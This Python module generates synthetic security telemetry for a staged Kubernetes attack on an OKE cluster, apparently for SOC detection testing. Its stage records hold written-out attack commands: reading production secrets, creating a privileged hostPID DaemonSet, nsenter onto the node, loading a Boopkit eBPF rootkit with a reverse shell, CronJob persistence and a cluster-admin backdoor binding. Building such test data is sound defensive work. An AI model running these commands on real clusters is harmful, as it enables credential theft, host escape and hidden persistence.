"""OKE/Kubernetes application attack synthetic events."""

from testlogs.application_core import application_event


def generate_oke_kubernetes_attack_events():
    """Generate OKE/Kubernetes attack telemetry in the SOC Application/APM schema."""
    attack_trace = "trace_oke_boopkit_attack_001"
    attack_id = "attack-oke-boopkit-001"
    run_id = "run-oke-k8s-attacks-001"
    request_id = "req_oke_boopkit_001"
    actor_ip = "198.51.100.88"
    stages = [
        {
            "stage": "api_recon",
            "message": "OKE API discovery requested cluster resources with kubectl",
            "severity": "medium",
            "technique_id": "T1613",
            "technique": "Container and Resource Discovery",
            "url": "/apis/apps/v1/namespaces/prod/deployments",
            "method": "GET",
            "status": "200",
            "span": "span_oke_boopkit_api_recon",
            "parent": "",
            "host": "oke-api-server",
            "workflow_step": "api-recon",
            "command": "kubectl get pods,secrets,daemonsets -A",
            "attributes": "k8s.audit.verb=list k8s.resource=pods,secrets userAgent=kubectl",
        },
        {
            "stage": "secret_collection",
            "message": "Service account token and registry secret read from production namespace",
            "severity": "high",
            "technique_id": "T1552.007",
            "technique": "Container and Cloud Credential Discovery",
            "url": "/api/v1/namespaces/prod/secrets/prod-registry-token",
            "method": "GET",
            "status": "200",
            "span": "span_oke_boopkit_secret_read",
            "parent": "span_oke_boopkit_api_recon",
            "host": "oke-api-server",
            "workflow_step": "secret-collection",
            "command": "kubectl get secret prod-registry-token -n prod -o yaml",
            "attributes": "k8s.audit.verb=get k8s.resource=secrets k8s.namespace=prod",
        },
        {
            "stage": "privileged_daemonset",
            "message": "Privileged DaemonSet created with hostPID and hostPath mounts",
            "severity": "critical",
            "technique_id": "T1611",
            "technique": "Escape to Host",
            "url": "/apis/apps/v1/namespaces/kube-system/daemonsets/node-diag-agent",
            "method": "POST",
            "status": "201",
            "span": "span_oke_boopkit_privileged_daemonset",
            "parent": "span_oke_boopkit_secret_read",
            "host": "oke-api-server",
            "workflow_step": "privileged-workload",
            "command": "kubectl apply -f daemonset-hostpid-hostpath.yaml",
            "attributes": "k8s.audit.verb=create k8s.resource=daemonsets privileged=true hostPID=true hostPath=/proc,/sys,/var/run",
        },
        {
            "stage": "node_exec",
            "message": "Interactive exec opened into privileged OKE node diagnostic pod",
            "severity": "high",
            "technique_id": "T1609",
            "technique": "Container Administration Command",
            "url": "/api/v1/namespaces/kube-system/pods/node-diag-agent-8fk2p/exec",
            "method": "POST",
            "status": "101",
            "span": "span_oke_boopkit_pod_exec",
            "parent": "span_oke_boopkit_privileged_daemonset",
            "host": "oke-worker-01",
            "workflow_step": "pod-exec",
            "command": "kubectl exec -n kube-system node-diag-agent-8fk2p -- nsenter -t 1 -m -u -i -n sh",
            "attributes": "k8s.audit.verb=create subresource=exec container=node-diag-agent nsenter host namespace",
        },
        {
            "stage": "boopkit_ebpf_load",
            "message": "Boopkit-style eBPF program load observed from privileged container",
            "severity": "critical",
            "technique_id": "T1014",
            "technique": "Rootkit",
            "url": "/proc/sys/kernel/bpf",
            "method": "POST",
            "status": "500",
            "span": "span_oke_boopkit_ebpf_load",
            "parent": "span_oke_boopkit_pod_exec",
            "host": "oke-worker-01",
            "workflow_step": "ebpf-rootkit",
            "command": "bpftool prog load boopkit_kern.o /sys/fs/bpf/boopkit type kprobe",
            "attributes": "boopkit ebpf rootkit bpftool kprobe /sys/fs/bpf traffic-hiding",
        },
        {
            "stage": "boopkit_c2_hide",
            "message": "Boopkit eBPF rootkit hid reverse shell and C2 listener traffic",
            "severity": "critical",
            "technique_id": "T1105",
            "technique": "Ingress Tool Transfer",
            "url": "/run/boopkit/c2",
            "method": "POST",
            "status": "503",
            "span": "span_oke_boopkit_c2_hide",
            "parent": "span_oke_boopkit_ebpf_load",
            "host": "oke-worker-01",
            "workflow_step": "c2-traffic-hide",
            "command": "boopkit --hide-port 443 --reverse-shell /bin/sh",
            "attributes": "boopkit reverse-shell hidden-port ebpf traffic hide",
        },
        {
            "stage": "cronjob_persistence",
            "message": "Kubernetes CronJob persistence created to relaunch node diagnostic payload",
            "severity": "high",
            "technique_id": "T1053.007",
            "technique": "Scheduled Task/Job: Container and Orchestration Job",
            "url": "/apis/batch/v1/namespaces/kube-system/cronjobs/node-diag-refresh",
            "method": "POST",
            "status": "201",
            "span": "span_oke_boopkit_cronjob_persistence",
            "parent": "span_oke_boopkit_c2_hide",
            "host": "oke-api-server",
            "workflow_step": "persistence",
            "command": "kubectl create cronjob node-diag-refresh --image=registry.example.test/node-diag:latest",
            "attributes": "k8s.audit.verb=create k8s.resource=cronjobs persistence daemonset relaunch",
        },
        {
            "stage": "rbac_backdoor",
            "message": "ClusterRoleBinding granted cluster-admin to workload service account",
            "severity": "critical",
            "technique_id": "T1098",
            "technique": "Account Manipulation",
            "url": "/apis/rbac.authorization.k8s.io/v1/clusterrolebindings/node-diag-admin",
            "method": "POST",
            "status": "201",
            "span": "span_oke_boopkit_rbac_backdoor",
            "parent": "span_oke_boopkit_cronjob_persistence",
            "host": "oke-api-server",
            "workflow_step": "rbac-backdoor",
            "command": "kubectl create clusterrolebinding node-diag-admin --clusterrole=cluster-admin --serviceaccount=kube-system:node-diag-agent",
            "attributes": "k8s.audit.verb=create k8s.resource=clusterrolebindings cluster-admin serviceaccount backdoor",
        },
    ]

    events = []
    for offset, stage in enumerate(stages, start=112):
        base_event = application_event(
            "octo-apm-demo",
            message=stage["message"],
            level="ERROR" if stage["severity"] in {"critical", "high"} else "WARN",
            url=stage["url"],
            http_method=stage["method"],
            status_code=stage["status"],
            response_time_ms=640 + (offset - 112) * 180,
            client_ip=actor_ip,
            user_agent="kubectl/v1.29 oci-oke-demo",
            user="system:serviceaccount:kube-system:node-diag-agent",
            trace_id=attack_trace,
            span_id=stage["span"],
            parent_span_id=stage["parent"],
            span_name=f"oke.attack.{stage['stage']}",
            span_attributes=stage["attributes"],
            error_type=stage["stage"] if stage["severity"] in {"critical", "high"} else None,
            slow_request=stage["severity"] == "critical",
            workflow_id="oke-kubernetes-attack-simulation",
            workflow_step=stage["workflow_step"],
            request_id=request_id,
            run_id=run_id,
            hostname=stage["host"],
            metric_name="oke.security.attack.event",
            metric_value="1",
            metric_unit="count",
            offset=offset,
        )
        events.append({
            **base_event,
            "security.attack.id": attack_id,
            "security.attack.stage": stage["stage"],
            "security.attack.type": "oke_kubernetes_attack",
            "security.attack.detected": True,
            "security.severity": stage["severity"],
            "mitre.tactic": "Defense Evasion" if "boopkit" in stage["stage"] else "Privilege Escalation",
            "mitre.technique_id": stage["technique_id"],
            "mitre.technique": stage["technique"],
            "source.ip": actor_ip,
            "host.name": stage["host"],
            "host.role": "oke-control-plane" if stage["host"] == "oke-api-server" else "oke-worker",
            "process.command_line": stage["command"],
            "kubernetes.cluster.name": "oke-demo-cluster",
            "kubernetes.namespace": "kube-system" if "kube-system" in stage["url"] else "prod",
            "kubernetes.audit.verb": "create" if stage["method"] == "POST" else "get",
            "kubernetes.audit.uri": stage["url"],
        })
    return events
